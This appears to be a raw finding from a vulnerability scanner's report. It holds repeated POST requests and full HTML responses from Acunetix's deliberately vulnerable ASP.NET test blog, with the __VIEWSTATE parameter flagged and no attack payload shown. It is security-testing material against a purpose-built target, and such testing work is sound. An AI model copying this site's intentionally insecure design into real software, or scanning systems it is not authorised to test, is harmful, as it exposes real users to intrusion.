Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8617&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAdOlGldsIZGRkYL0PyV5G6N4DAbyHR32fI6IR8pI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2F1PuMCQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogYA2LueDHo%2BKt977vtU9Y03NuqsYA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:10 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAdOlGldsIZGRkYL0PyV5G6N4DAbyHR32fI6IR8pI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK/1PuMCQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogYA2LueDHo+Kt977vtU9Y03NuqsYA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:White" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8621&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAG5NrmNsIZGRkKuDuL02udpi4Wf26CxyxdW41pr0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLsp7uCBAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogak7Y%2Fs1tixzhw8CR8Ie7uyn9N7VA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:51 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAG5NrmNsIZGRkKuDuL02udpi4Wf26CxyxdW41pr0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLsp7uCBAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogak7Y/s1tixzhw8CR8Ie7uyn9N7VA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:White" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
